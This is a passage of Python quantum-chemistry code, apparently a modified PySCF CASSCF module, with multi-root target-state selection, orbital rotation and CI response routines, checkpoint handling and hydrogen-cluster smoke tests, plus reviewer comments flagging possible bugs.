                             'CASSCF E = %.15g dE = %.8g S^2 = %.7f',
                             envs['imacro'], envs['njk'], envs['imicro'],
                             e_tot, e_tot-envs['elast'], ss[0])
                if 'norm_gci' in envs:
                    log.info(' |grad[o]|=%5.3g '
                             '|grad[c]|= %s |ddm|=%5.3g',
                             envs['norm_gorb0'],
                             envs['norm_gci'], envs['norm_ddm'])
                else:
                    log.info(' |grad[o]|=%5.3g |ddm|=%5.3g',
                             envs['norm_gorb0'], envs['norm_ddm'])
            else:  # Initialization step
                if ss is None:
                    log.info('CASCI E = %.15g', e_tot)
                else:
                    log.info('CASCI E = %.15g S^2 = %.7f', e_tot, ss[0])
    else:
        # Multi-root solver: e_tot / e_cas / fcivec are per-root sequences.
        nroots = len(e_tot)
        if envs is not None and log.verbose >= logger.INFO:
            #log.debug('CAS space CI energy = %.15g', e_cas)
            if 'imicro' in envs:  # Within CASSCF iteration
                #if self.target_state == 0: # ground state
                #    #if (numpy.ndim(e_cas) > 0):
                #    # This is a workaround for external CI solver compatibility.
                #    e_cas = e_cas[0]
                #    fcivec = fcivec[0]
                #    e_tot = e_tot[0]
                #Lan: select target state
                if(self.is_select_state):
                    if envs['imacro'] > 0:
                        log.info('CASCI information')
                        if(self.is_use_sCI):
                            # Parse the external selected-CI program's
                            # output for vectors, configurations and <S^2>.
                            civec, config, spin_square_states = read_sCI_output(self.ncas)
                        for i in range(nroots):
                            if not self.is_use_sCI:
                                ss = self.fcisolver.spin_square(fcivec[i], self.ncas, self.nelecas)[0]
                            else:
                                ss = extract_spin_state_sCI(i, civec, config)
                                ss = spin_square_states[i]
                            log.info('CASCI state %d E = %.15g S^2 = %.7f',
                                     i, e_tot[i], ss)
                        # target the desired state
                        print()
                        log.info('Selecting the CI vector ...')
                        self.target_state, dipole = select_target_state(self, mo_coeff, fcivec, e_tot, envs, self.target_state, nroots, eris)
                        log.info('Targeted root %d, dipole: %8.5f, %8.5f, %8.5f', self.target_state, *dipole)
                        if not self.is_use_sCI:
                            nat_orbs = self.cas_natorb(mo_coeff, fcivec[self.target_state])
                #else:
                #    target_state = self.target_state
                # Collapse the per-root arrays onto the targeted root.
                e_tot = e_tot[self.target_state]
                e_cas = e_cas[self.target_state]
                fcivec = fcivec[self.target_state]
                if getattr(self.fcisolver, 'spin_square', None):
                    ss = self.fcisolver.spin_square(fcivec, self.ncas, self.nelecas)
                else:
                    ss = None
                if ss is None:
                    log.info('macro iter %d (%d JK %d micro), '
                             'CASSCF E = %.15g dE = %.8g',
                             envs['imacro'], envs['njk'], envs['imicro'],
                             e_tot, e_tot-envs['elast'])
                else:
                    log.info('macro iter %d (%d JK %d micro), '
                             'CASSCF E = %.15g dE = %.8g S^2 = %.7f',
                             envs['imacro'], envs['njk'], envs['imicro'],
                             e_tot, e_tot-envs['elast'], ss[0])
                if 'norm_gci' in envs:
                    log.info(' |grad[o]|=%5.3g '
                             '|grad[c]|= %s |ddm|=%5.3g',
                             envs['norm_gorb0'],
                             envs['norm_gci'], envs['norm_ddm'])
                else:
                    log.info(' |grad[o]|=%5.3g |ddm|=%5.3g',
                             envs['norm_gorb0'], envs['norm_ddm'])
            else:  # Initialization step
                geom_cycle = 0
                if os.environ.get("cycle") is not None:
                    # Geometry-optimization cycle counter exported by the
                    # driving script via the environment.
                    geom_cycle = int(os.environ["cycle"])+1
                #print "geomopt cycle = ", geom_cycle
                print()
                log.info('CASCI information')
                #reading sCI information from output.dat
                civec = [] #dump variable for sCI
                config = [] # dump variable for sCI
                if(self.is_use_sCI):
                    civec, config, spin_square_states = read_sCI_output(self.ncas)
                for i in range(nroots):
                    if not self.is_use_sCI:
                        ss = self.fcisolver.spin_square(fcivec[i], self.ncas, self.nelecas)[0]
                    else:
                        ss = extract_spin_state_sCI(i, civec, config)
                        ss = spin_square_states[i]
                    log.info('CASCI state %d E = %.15g S^2 = %.7f',
                             i, e_tot[i], ss)
                print()
                for i in range(nroots):
                    # Per-root analysis: dipole moment and natural orbitals.
                    print("Root ", i)
                    rdm1_AO = addons.make_rdm1(self, mo_coeff, fcivec[i])
                    #print "rdm1_AO"
                    #print rdm1_AO
                    d = scf.hf.dip_moment(mol=self.mol, dm=rdm1_AO)
                    print()
                    if not self.is_use_sCI:
                        nat_orbs = self.cas_natorb(mo_coeff, fcivec[i])
                    print()
                    #print "CI vector"
                    #print fcivec[i]
                    #exit()
                #select target state for new geometry opt cycle
                if geom_cycle > 1 and self.is_select_state:
                    print("Selecting target state for new geometry opt cycle")
                    nmo = mo_coeff.shape[1]
                    rdm1_prevgeom_AO = envs['rdm1_pregeom_AO']
                    rdm1_prevgeom_MO = rota_rdms(mo_coeff, rdm1_prevgeom_AO) #rotate rdm1 to new MOs
                    d_prevgeom = scf.hf.dip_moment(mol=self.mol, dm=rdm1_prevgeom_AO)
                    k = 0
                    self.target_state = 0
                    for s in range(nroots):
                        if not self.is_use_sCI:
                            ss = self.fcisolver.spin_square(fcivec[s], self.ncas, self.nelecas)[0]
                        else:
                            ss = extract_spin_state_sCI(s, civec, config)
                            ss = spin_square_states[s]
                        casdm1, casdm2 = self.fcisolver.make_rdm12(fcivec[s], self.ncas, self.nelecas)
                        #casdm1 = self.fcisolver.make_rdm1(fcivec[s], self.ncas, self.nelecas)
                        #casdm2 = self.fcisolver.make_rdm2(fcivec[s], self.ncas, self.nelecas)
                        rdm1_MO, rdm2_MO = addons._make_rdm12_on_mo(casdm1, casdm2, self.ncore, self.ncas, nmo)
                        # Distance (per active orbital) between this root's
                        # density matrix and the previous geometry's.
                        dNorm = ddmNorm = 1./self.ncas * numpy.linalg.norm(rdm1_MO - rdm1_prevgeom_MO)
                        if self.is_target_dipole:
                            # NOTE(review): addons.make_rdm12 here vs
                            # addons.make_rdm1 above -- if make_rdm12
                            # returns a tuple, dip_moment on it looks
                            # wrong; confirm.
                            rdm1_AO = addons.make_rdm12(self, self.mo_coeff, fcivec[s])
                            d = scf.hf.dip_moment(mol=self.mol, dm=rdm1_AO)
                            ddipoleNorm = numpy.linalg.norm(d - d_prevgeom)
                            dNorm += ddipoleNorm
                        print("state ", s, "ddmNorm = ", abs(ddmNorm), "dNorm = ", abs(dNorm))
                        #print rdm1_MO
                        #print
                        #ddmNorm_min = 0.
                        #if s == 0:
                        # Only roots with the requested spin compete.
                        ss_target = 0.5*self.target_state_spin*(0.5*self.target_state_spin+1)
                        if abs(ss - ss_target) < 1e-2:
                            if k == 0:
                                dNorm_min = abs(dNorm)
                                k += 1
                            else:
                                if abs(dNorm) < dNorm_min:
                                    self.target_state = s
                                    dNorm_min = abs(dNorm)
                                print("dNorm ", dNorm, dNorm_min)
                        else:
                            # NOTE(review): one root of the wrong spin
                            # aborts the whole run here; it looks like the
                            # intent may have been to skip the root --
                            # confirm before relying on this path.
                            print("there is no desirable spin state")
                            exit()
                    print()
                    #self.target_state = 2
                log.info('Initial targeted root %d', self.target_state)
                print()
                e_tot = e_tot[self.target_state]
                e_cas = e_cas[self.target_state]
                fcivec = fcivec[self.target_state]
                #if getattr(self.fcisolver, 'spin_square', None):
                #    ss = self.fcisolver.spin_square(fcivec, self .ncas, self.nelecas)
                #else:
                #    ss = None
                #if ss is None:
                #    log.info('CASCI E = %.15g', e_tot)
                #else:
                #    log.info('CASCI E = %.15g S^2 = %.7f', e_tot, ss[0])
                #
    return e_tot, e_cas, fcivec
as_scanner = as_scanner
def uniq_var_indices(self, nmo, ncore, ncas, frozen):
    """Boolean mask of the independent orbital-rotation variables.

    Active-core and virtual-occupied rotations are always free; the lower
    triangle of the active-active block is added only when
    internal_rotation is enabled.  Frozen orbitals are removed from every
    rotation (both as row and as column).
    """
    nocc = ncore + ncas
    free = numpy.zeros((nmo, nmo), dtype=bool)
    free[ncore:nocc, :ncore] = True      # active <- core
    free[nocc:, :nocc] = True            # virtual <- occupied
    if self.internal_rotation:
        free[ncore:nocc, ncore:nocc][numpy.tril_indices(ncas, -1)] = True
    if frozen is not None:
        if isinstance(frozen, (int, numpy.integer)):
            # An integer freezes the lowest `frozen` orbitals.
            free[:frozen] = False
            free[:, :frozen] = False
        else:
            frozen_idx = numpy.asarray(frozen)
            free[frozen_idx] = False
            free[:, frozen_idx] = False
    return free
def pack_uniq_var(self, mat):
    """Flatten *mat* down to the vector of independent rotation variables."""
    norb = self.mo_coeff.shape[1]
    keep = self.uniq_var_indices(norb, self.ncore, self.ncas, self.frozen)
    return mat[keep]
# to anti symmetric matrix
def unpack_uniq_var(self, v):
    """Expand the packed rotation vector *v* into an antisymmetric matrix."""
    norb = self.mo_coeff.shape[1]
    keep = self.uniq_var_indices(norb, self.ncore, self.ncas, self.frozen)
    full = numpy.zeros((norb, norb))
    full[keep] = v
    # K - K.T makes the result antisymmetric.
    return full - full.T
def update_rotate_matrix(self, dx, u0=1):
    """Apply the packed step *dx* as a unitary rotation on top of *u0*.

    The step is expanded to an antisymmetric matrix K and exp(K) is
    right-multiplied onto u0.
    """
    kappa = self.unpack_uniq_var(dx)
    rotation = expmat(kappa)
    return numpy.dot(u0, rotation)
# Orbital gradient/Hessian machinery, bound from module-level helpers.
gen_g_hop = gen_g_hop
rotate_orb_cc = rotate_orb_cc
#genMinRes = genMinRes
rotate_orb_gmres = rotate_orb_gmres
def update_ao2mo(self, mo):
    # Deliberately raises: this entry point was removed in pyscf v1.0.
    raise DeprecationWarning('update_ao2mo was obseleted since pyscf v1.0. '
                             'Use .ao2mo method instead')
def ao2mo(self, mo_coeff=None):
    """Build the MO-basis two-electron integral intermediates (in core).

    Args:
        mo_coeff: MO coefficients; defaults to ``self.mo_coeff``.

    Returns:
        An ``mc_ao2mo._ERIS`` object holding the integral blocks
        (e.g. ``vhf_c``, ``ppaa``, ``papa``) consumed by update_casdm
        and the orbital gradient/Hessian code.
    """
    # The long commented-out manual in-core transformation that used to
    # live here has been removed; _ERIS performs the same work.
    if mo_coeff is None:
        mo_coeff = self.mo_coeff
    return mc_ao2mo._ERIS(self, mo_coeff, method='incore',
                          level=self.ao2mo_level)
# Don't remove the two functions. They are used in df.approx_hessian code
def get_h2eff(self, mo_coeff=None):
    '''Computing active space two-particle Hamiltonian.

    Note It is different to get_h2cas when df.approx_hessian is applied,
    in which get_h2eff function returns the DF integrals while get_h2cas
    returns the regular 2-electron integrals.
    '''
    # Plain CASSCF: both entry points yield the same integrals.
    return self.get_h2cas(mo_coeff)
def get_h2cas(self, mo_coeff=None):
    '''Computing active space two-particle Hamiltonian.

    Note It is different to get_h2eff when df.approx_hessian is applied,
    in which get_h2eff function returns the DF integrals while get_h2cas
    returns the regular 2-electron integrals.
    '''
    # Delegate to the parent CASCI transformation.
    return casci.CASCI.ao2mo(self, mo_coeff)
def update_jk_in_ah(self, mo, r, casdm1, eris):
    """J/K response matrices to the orbital rotation *r*, for the
    augmented-Hessian update (core block ``vc`` and active block ``va``).
    """
    # J3 = eri_popc * pc + eri_cppo * cp
    # K3 = eri_ppco * pc + eri_pcpo * cp
    # J4 = eri_pcpa * pa + eri_appc * ap
    # K4 = eri_ppac * pa + eri_papc * ap
    ncore = self.ncore
    ncas = self.ncas
    nocc = ncore + ncas

    # Symmetrized transition densities for the core and active rotations.
    dm3 = reduce(numpy.dot, (mo[:,:ncore], r[:ncore,ncore:], mo[:,ncore:].T))
    dm3 = dm3 + dm3.T
    dm4 = reduce(numpy.dot, (mo[:,ncore:nocc], casdm1, r[ncore:nocc], mo.T))
    dm4 = dm4 + dm4.T
    vj, vk = self.get_jk(self.mol, (dm3,dm3*2+dm4))
    va = reduce(numpy.dot, (casdm1, mo[:,ncore:nocc].T, vj[0]*2-vk[0], mo))
    vc = reduce(numpy.dot, (mo[:,:ncore].T, vj[1]*2-vk[1], mo[:,ncore:]))
    return va, vc
# hessian_co exactly expands up to first order of H
# update_casdm exand to approx 2nd order of H
def update_casdm(self, mo, u, fcivec, e_cas, eris, envs={}):
    """Update the active-space density matrices after an orbital step.

    Builds the approximately rotated effective Hamiltonian (h1, h2),
    solves the CI response problem, and returns the refreshed 1-/2-RDMs
    plus the CI gradient and updated CI vector.

    NOTE: ``envs`` has a mutable default; it is only read here and passed
    along, so this is safe as long as callees do not mutate it.
    """
    nmo = mo.shape[1]
    rmat = u - numpy.eye(nmo)

    #g = hessian_co(self, mo, rmat, fcivec, e_cas, eris)
    ### hessian_co part start ###
    ncas = self.ncas
    nelecas = self.nelecas
    ncore = self.ncore
    nocc = ncore + ncas
    uc = u[:,:ncore]
    ua = u[:,ncore:nocc].copy()
    ra = rmat[:,ncore:nocc].copy()
    h1e_mo = reduce(numpy.dot, (mo.T, self.get_hcore(), mo))
    # Change of the core density induced by the rotation of the core
    # orbitals (relative to the unit occupation of 2 per orbital).
    ddm = numpy.dot(uc, uc.T) * 2
    ddm[numpy.diag_indices(ncore)] -= 2
    if self.with_dep4:
        # 4th-order density expansion: rebuild vhf from the rotated core
        # and use exact (paaa) integrals.
        mo1 = numpy.dot(mo, u)
        mo1_cas = mo1[:,ncore:nocc]
        dm_core = numpy.dot(mo1[:,:ncore], mo1[:,:ncore].T) * 2
        vj, vk = self._scf.get_jk(self.mol, dm_core)
        h1 =(reduce(numpy.dot, (ua.T, h1e_mo, ua)) +
             reduce(numpy.dot, (mo1_cas.T, vj-vk*.5, mo1_cas)))
        eris._paaa = self._exact_paaa(mo, u)
        h2 = eris._paaa[ncore:nocc]
        vj = vk = None
    else:
        # Default path: approximate rotated integrals from the cached
        # ppaa/papa blocks.
        p1aa = numpy.empty((nmo,ncas,ncas**2))
        paa1 = numpy.empty((nmo,ncas**2,ncas))
        jk = reduce(numpy.dot, (ua.T, eris.vhf_c, ua))
        for i in range(nmo):
            jbuf = eris.ppaa[i]
            kbuf = eris.papa[i]
            jk +=(numpy.einsum('quv,q->uv', jbuf, ddm[i])
                - numpy.einsum('uqv,q->uv', kbuf, ddm[i]) * .5)
            p1aa[i] = lib.dot(ua.T, jbuf.reshape(nmo,-1))
            paa1[i] = lib.dot(kbuf.transpose(0,2,1).reshape(-1,nmo), ra)
        h1 = reduce(numpy.dot, (ua.T, h1e_mo, ua)) + jk
        aa11 = lib.dot(ua.T, p1aa.reshape(nmo,-1)).reshape((ncas,)*4)
        aaaa = eris.ppaa[ncore:nocc,ncore:nocc,:,:]
        aa11 = aa11 + aa11.transpose(2,3,0,1) - aaaa
        a11a = numpy.dot(ra.T, paa1.reshape(nmo,-1)).reshape((ncas,)*4)
        a11a = a11a + a11a.transpose(1,0,2,3)
        a11a = a11a + a11a.transpose(0,1,3,2)
        h2 = aa11 + a11a
        jbuf = kbuf = p1aa = paa1 = aaaa = aa11 = a11a = None
    # pure core response
    # response of (1/2 dm * vhf * dm) ~ ddm*vhf
    # Should I consider core response as a part of CI gradients?
    ecore =(numpy.einsum('pq,pq->', h1e_mo, ddm)
          + numpy.einsum('pq,pq->', eris.vhf_c, ddm))
    ### hessian_co part end ###

    ci1, g = self.solve_approx_ci(h1, h2, fcivec, ecore, e_cas, envs)
    if g is not None:  # So state average CI, DMRG etc will not be applied
        # Trust-region safeguard: if the new CI vector drifted too far
        # relative to the gradient norm, fall back to a gradient step.
        ovlp = numpy.dot(fcivec.ravel(), ci1.ravel())
        #print "ci ovlp ", ovlp
        norm_g = numpy.linalg.norm(g)
        if 1-abs(ovlp) > norm_g * self.ci_grad_trust_region:
            logger.debug(self, '<ci1|ci0>=%5.3g |g|=%5.3g, ci1 out of trust region',
                         ovlp, norm_g)
            ci1 = fcivec.ravel() + g
            ci1 *= 1/numpy.linalg.norm(ci1)
    casdm1, casdm2 = self.fcisolver.make_rdm12(ci1, ncas, nelecas)

    return casdm1, casdm2, g, ci1
def solve_approx_ci(self, h1, h2, ci0, ecore, e_cas, envs):
    ''' Solve CI eigenvalue/response problem approximately
    '''
    ncas = self.ncas
    nelecas = self.nelecas
    ncore = self.ncore
    nocc = ncore + ncas
    # Loose tolerance tied to the orbital gradient: the CI only needs to
    # be as accurate as the current orbital step.
    if 'norm_gorb' in envs:
        tol = max(self.conv_tol, envs['norm_gorb']**2*.1)
    else:
        tol = None

    if getattr(self.fcisolver, 'approx_kernel', None):
        # Solver provides its own approximate kernel (e.g. DMRG).
        fn = self.fcisolver.approx_kernel
        e, ci1 = fn(h1, h2, ncas, nelecas, ecore=ecore, ci0=ci0,
                    tol=tol, max_memory=self.max_memory)
        return ci1, None
    elif not (getattr(self.fcisolver, 'contract_2e', None) and
              getattr(self.fcisolver, 'absorb_h1e', None)):
        # External solver without Hamiltonian contraction: run a short
        # full diagonalization instead of the subspace response below.
        fn = self.fcisolver.kernel
        e, ci1 = fn(h1, h2, ncas, nelecas, ecore=ecore, ci0=ci0,
                    tol=tol, max_memory=self.max_memory,
                    max_cycle=self.ci_response_space)
        return ci1, None

    h2eff = self.fcisolver.absorb_h1e(h1, h2, ncas, nelecas, .5)

    # Be careful with the symmetry adapted contract_2e function. When the
    # symmetry adapted FCI solver is used, the symmetry of ci0 may be
    # different to fcisolver.wfnsym. This function may output 0.
    if getattr(self.fcisolver, 'guess_wfnsym', None):
        wfnsym = self.fcisolver.guess_wfnsym(self.ncas, self.nelecas, ci0)
    else:
        wfnsym = None
    def contract_2e(c):
        if wfnsym is None:
            hc = self.fcisolver.contract_2e(h2eff, c, ncas, nelecas)
        else:
            with lib.temporary_env(self.fcisolver, wfnsym=wfnsym):
                hc = self.fcisolver.contract_2e(h2eff, c, ncas, nelecas)
        return hc.ravel()

    hc = contract_2e(ci0)
    # CI gradient: H|ci0> - E|ci0>.
    g = hc - (e_cas-ecore) * ci0.ravel()

    if self.ci_response_space > 7:
        logger.debug(self, 'CI step by full response')
        # full response
        max_memory = max(400, self.max_memory-lib.current_memory()[0])
        e, ci1 = self.fcisolver.kernel(h1, h2, ncas, nelecas, ecore=ecore,
                                       ci0=ci0, tol=tol, max_memory=max_memory)
    else:
        # Small Krylov-like subspace built from repeated contractions.
        nd = min(max(self.ci_response_space, 2), ci0.size)
        logger.debug(self, 'CI step by %dD subspace response', nd)
        xs = [ci0.ravel()]
        ax = [hc]
        heff = numpy.empty((nd,nd))
        seff = numpy.empty((nd,nd))
        heff[0,0] = numpy.dot(xs[0], ax[0])
        seff[0,0] = 1
        for i in range(1, nd):
            xs.append(ax[i-1] - xs[i-1] * e_cas)
            ax.append(contract_2e(xs[i]))
            for j in range(i+1):
                heff[i,j] = heff[j,i] = numpy.dot(xs[i], ax[j])
                seff[i,j] = seff[j,i] = numpy.dot(xs[i], xs[j])
        e, v = lib.safe_eigh(heff, seff)[:2]
        ci1 = xs[0] * v[0,0]
        for i in range(1,nd):
            ci1 += xs[i] * v[i,0]
    # NOTE(review): stock PySCF returns ``ci1`` here.  Indexing with
    # self.target_state only makes sense when the solver returned one
    # vector per root; in the subspace branch above ci1 is a single flat
    # array, so ci1[self.target_state] picks a scalar element.  Confirm
    # this is intended for the multi-root workflow.
    return ci1[self.target_state], g
def get_jk(self, mol, dm, hermi=1):
    """Coulomb (J) and exchange (K) matrices for density *dm*.

    Bug fix: the *hermi* argument is now forwarded to the underlying SCF
    object instead of being hard-coded to 1, so non-hermitian densities
    are contracted correctly when the caller requests it.
    """
    return self._scf.get_jk(mol, dm, hermi=hermi)
def get_grad(self, mo_coeff=None, casdm1_casdm2=None, eris=None):
    '''Orbital gradients'''
    if mo_coeff is None: mo_coeff = self.mo_coeff
    if eris is None: eris = self.ao2mo(mo_coeff)
    if casdm1_casdm2 is None:
        # No RDMs supplied: solve the CASCI problem at the current
        # orbitals and build the 1-/2-particle density matrices.
        e_tot, e_cas, civec = self.casci(mo_coeff, self.ci, eris)
        casdm1, casdm2 = self.fcisolver.make_rdm12(civec, self.ncas, self.nelecas)
    else:
        casdm1, casdm2 = casdm1_casdm2
    # gen_g_hop returns the gradient as its first element.
    return self.gen_g_hop(mo_coeff, 1, casdm1, casdm2, eris)[0]
def _exact_paaa(self, mo, u, out=None):
    """Exact (p,a|a,a) integrals over the rotated orbitals mo.dot(u).

    Only the (active,active|full,active) integrals are generated through
    ao2mo.general and then rearranged into (full,active,active,active)
    order.

    Args:
        mo: current MO coefficients.
        u: orbital rotation applied on top of *mo*.
        out: optional preallocated output buffer for lib.transpose.
    """
    nmo = mo.shape[1]
    ncore = self.ncore
    ncas = self.ncas
    nocc = ncore + ncas
    mo1 = numpy.dot(mo, u)
    mo1_cas = mo1[:,ncore:nocc]
    mos = (mo1_cas, mo1_cas, mo1, mo1_cas)
    if self._scf._eri is None:
        aapa = ao2mo.general(self.mol, mos)
    else:
        aapa = ao2mo.general(self._scf._eri, mos)
    # (Removed a dead numpy.empty allocation of `paaa` that was
    # immediately overwritten below.)
    # Scatter the triangular-packed (aa|pa) rows into a full square
    # buffer, then transpose into paaa order.
    buf = numpy.empty((ncas,ncas,nmo*ncas))
    for ij, (i, j) in enumerate(zip(*numpy.tril_indices(ncas))):
        buf[i,j] = buf[j,i] = aapa[ij]
    paaa = lib.transpose(buf.reshape(ncas*ncas,-1), out=out)
    return paaa.reshape(nmo,ncas,ncas,ncas)
def dump_chk(self, envs):
    """Write the current MCSCF state to self.chkfile (no-op when unset).

    *envs* is the dict of local variables from the macro-iteration scope.
    """
    if not self.chkfile:
        return self

    # CI vectors are stored only when requested and when the solver is
    # not an NEVPT intermediate.
    if getattr(self.fcisolver, 'nevpt_intermediate', None):
        civec = None
    elif self.chk_ci:
        civec = envs['fcivec']
    else:
        civec = None
    ncore = self.ncore
    nocc = self.ncore + self.ncas
    if 'mo' in envs:
        mo_coeff = envs['mo']
    else:
        mo_coeff = envs['mo_coeff']
    mo_occ = numpy.zeros(mo_coeff.shape[1])
    mo_occ[:ncore] = 2
    if self.natorb:
        # Diagonalize -casdm1 and negate back, presumably so the natural
        # occupations come out in descending order -- confirm _eig's
        # ordering before changing this.
        occ = self._eig(-envs['casdm1'], ncore, nocc)[0]
        mo_occ[ncore:nocc] = -occ
    else:
        mo_occ[ncore:nocc] = envs['casdm1'].diagonal()
    # Note: mo_energy in active space =/= F_{ii} (F is general Fock)
    if 'mo_energy' in envs:
        mo_energy = envs['mo_energy']
    else:
        # NOTE: the literal string 'None' is stored as a sentinel when no
        # mo_energy is available; downstream chkfile readers appear to
        # expect this -- confirm before changing.
        mo_energy = 'None'
    chkfile.dump_mcscf(self, self.chkfile, 'mcscf', envs['e_tot'],
                       mo_coeff, self.ncore, self.ncas, mo_occ,
                       mo_energy, envs['e_cas'], civec, envs['casdm1'],
                       overwrite_mol=False)
    return self
def update_from_chk(self, chkfile=None):
    """Restore this object's attributes from an MCSCF checkpoint file."""
    source = self.chkfile if chkfile is None else chkfile
    saved = lib.chkfile.load(source, 'mcscf')
    self.__dict__.update(saved)
    return self
update = update_from_chk
def rotate_mo(self, mo, u, log=None):
    '''Rotate orbitals with the given unitary matrix'''
    mo = numpy.dot(mo, u)
    if log is not None and log.verbose >= logger.DEBUG:
        # Report how much the active space drifted, both relative to the
        # initial guess and relative to the previous step (singular
        # values of the overlap near 1 indicate little mixing).
        ncore = self.ncore
        ncas = self.ncas
        nocc = ncore + ncas
        s = reduce(numpy.dot, (mo[:,ncore:nocc].T, self._scf.get_ovlp(),
                               self.mo_coeff[:,ncore:nocc]))
        log.debug('Active space overlap to initial guess, SVD = %s',
                  numpy.linalg.svd(s)[1])
        log.debug('Active space overlap to last step, SVD = %s',
                  numpy.linalg.svd(u[ncore:nocc,ncore:nocc])[1])
    return mo
def micro_cycle_scheduler(self, envs):
    """Number of micro iterations allowed in the next macro cycle.

    With the scheduler enabled, more micro steps are granted as the
    density-matrix change shrinks (log of norm_ddm goes negative).
    """
    if not WITH_MICRO_SCHEDULER:
        return self.max_cycle_micro
    log_norm_ddm = numpy.log(envs['norm_ddm'])
    scheduled = int(self.max_cycle_micro - 1 - log_norm_ddm)
    return max(self.max_cycle_micro, scheduled)
def max_stepsize_scheduler(self, envs):
    """Adaptive trust radius for the orbital rotation step."""
    if not WITH_STEPSIZE_SCHEDULER:
        return self.max_stepsize
    if self._max_stepsize is None:
        self._max_stepsize = self.max_stepsize
    if envs['de'] > -self.conv_tol:  # Avoid total energy increasing
        # Energy rose (or stalled): shrink the step sharply.
        self._max_stepsize *= .3
        logger.debug(self, 'set max_stepsize to %g', self._max_stepsize)
    else:
        # Converging: relax the radius back toward the user setting via
        # the geometric mean.
        self._max_stepsize = (self.max_stepsize*self._max_stepsize)**.5
    return self._max_stepsize
def ah_scheduler(self, envs):
    # Placeholder hook for augmented-Hessian parameter scheduling;
    # intentionally a no-op here.
    pass
@property
def max_orb_stepsize(self):  # pragma: no cover
    # Deprecated alias kept for old scripts; see max_stepsize.
    return self.max_stepsize
@max_orb_stepsize.setter
def max_orb_stepsize(self, x):  # pragma: no cover
    sys.stderr.write('WARN: Attribute "max_orb_stepsize" was replaced by "max_stepsize"\n')
    self.max_stepsize = x
@property
def ci_update_dep(self):  # pragma: no cover
    # Deprecated alias: the old integer "dep" level collapsed to the
    # boolean with_dep4 flag.
    return self.with_dep4
@ci_update_dep.setter
def ci_update_dep(self, x):  # pragma: no cover
    sys.stderr.write('WARN: Attribute .ci_update_dep was replaced by .with_dep4 since PySCF v1.1.\n')
    # Only the legacy value 4 maps to with_dep4=True.
    self.with_dep4 = x == 4
grad_update_dep = ci_update_dep
@property
def max_cycle(self):
    # Convenience alias for max_cycle_macro.
    return self.max_cycle_macro
@max_cycle.setter
def max_cycle(self, x):
    self.max_cycle_macro = x
def approx_hessian(self, auxbasis=None, with_df=None):
    # Decorate this object with a density-fitting approximation for the
    # orbital Hessian.
    from pyscf.mcscf import df
    return df.approx_hessian(self, auxbasis, with_df)
def nuc_grad_method(self):
    # Analytical nuclear-gradient driver for this CASSCF object.
    from pyscf.grad import casscf
    return casscf.Gradients(self)
def newton(self):
    # Convert to a second-order (Newton) CASSCF solver, copying all
    # current settings onto the new object.
    from pyscf.mcscf import newton_casscf
    mc1 = newton_casscf.CASSCF(self._scf, self.ncas, self.nelecas)
    mc1.__dict__.update(self.__dict__)
    # Override the copied value: the Newton solver uses a larger
    # micro-cycle count per macro step.
    mc1.max_cycle_micro = 10
    return mc1
# to avoid calculating AO integrals
def _fake_h_for_fast_casci(casscf, mo, eris):
    """Shallow copy of *casscf* with precomputed effective Hamiltonians.

    The returned object answers get_h1eff/get_h2eff from the integrals
    already stored in *eris*, so the subsequent CASCI kernel does not
    recompute AO integrals.
    """
    mc = copy.copy(casscf)
    mc.mo_coeff = mo

    ncore = casscf.ncore
    nocc = ncore + casscf.ncas
    mo_core = mo[:,:ncore]
    mo_cas = mo[:,ncore:nocc]

    # Effective one-electron Hamiltonian over the active orbitals, plus
    # the frozen-core (nuclear + core) energy.
    core_dm = numpy.dot(mo_core, mo_core.T) * 2
    hcore = casscf.get_hcore()
    energy_core = casscf.energy_nuc()
    energy_core += numpy.einsum('ij,ji', core_dm, hcore)
    energy_core += eris.vhf_c[:ncore,:ncore].trace()
    h1eff = reduce(numpy.dot, (mo_cas.T, hcore, mo_cas))
    h1eff += eris.vhf_c[ncore:nocc,ncore:nocc]
    mc.get_h1eff = lambda *args: (h1eff, energy_core)

    # Active-space two-electron integrals taken directly from eris.
    # (A redundant recomputation of ncore/nocc here was removed.)
    eri_cas = eris.ppaa[ncore:nocc,ncore:nocc,:,:].copy()
    mc.get_h2eff = lambda *args: eri_cas
    return mc
def expmat(a):
    """Matrix exponential exp(a), delegated to SciPy's implementation."""
    exponential = scipy.linalg.expm(a)
    return exponential
if __name__ == '__main__':
    from pyscf import scf
    from pyscf import fci
    from pyscf.mcscf import addons

    # Smoke test 1: 8-H cluster, CASSCF(4,4) vs a reference energy.
    mol = gto.Mole()
    mol.verbose = 0
    mol.output = None#"out_h2o"
    mol.atom = [
        ['H', ( 1.,-1. , 0. )],
        ['H', ( 0.,-1. ,-1. )],
        ['H', ( 1.,-0.5 ,-1. )],
        ['H', ( 0.,-0.5 ,-1. )],
        ['H', ( 0.,-0.5 ,-0. )],
        ['H', ( 0.,-0. ,-1. )],
        ['H', ( 1.,-0.5 , 0. )],
        ['H', ( 0., 1. , 1. )],
    ]

    mol.basis = {'H': 'sto-3g',
                 'O': '6-31g',}
    mol.build()

    m = scf.RHF(mol)
    ehf = m.scf()
    emc = kernel(CASSCF(m, 4, 4), m.mo_coeff, verbose=4)[1]
    print(ehf, emc, emc-ehf)
    print(emc - -3.22013929407)

    # Same cluster with an open-shell (3,1) active space.
    mc = CASSCF(m, 4, (3,1))
    mc.verbose = 4
    #mc.fcisolver = fci.direct_spin1
    mc.fcisolver = fci.solver(mol, False)
    emc = kernel(mc, m.mo_coeff, verbose=4)[1]
    print(emc - -15.950852049859-mol.energy_nuc())

    # Smoke test 2: stretched 8-H geometry.
    mol.atom = [
        ['H', ( 5.,-1. , 1. )],
        ['H', ( 0.,-5. ,-2. )],
        ['H', ( 4.,-0.5 ,-3. )],
        ['H', ( 0.,-4.5 ,-1. )],
        ['H', ( 3.,-0.5 ,-0. )],
        ['H', ( 0.,-3. ,-1. )],
        ['H', ( 2.,-2.5 , 0. )],
        ['H', ( 1., 1. , 3. )],
    ]
    mol.basis = {'H': 'sto-3g',
                 'O': '6-31g',}
    mol.build()

    m = scf.RHF(mol)
    ehf = m.scf()
    emc = kernel(CASSCF(m, 4, 4), m.mo_coeff, verbose=4)[1]
    print(ehf, emc, emc-ehf)
    print(emc - -3.62638367550087, emc - -3.6268060528596635)

    mc = CASSCF(m, 4, (3,1))
    mc.verbose = 4
    mc.natorb = 1
    #mc.fcisolver = fci.direct_spin1
    mc.fcisolver = fci.solver(mol, False)
    emc = kernel(mc, m.mo_coeff, verbose=4)[1]
    print(emc - -3.62638367550087)

    # Smoke test 3: water / cc-pVDZ, CASSCF(6,4) with hand-picked active
    # orbitals, exercising mc1step and internal rotations.
    mol.atom = [
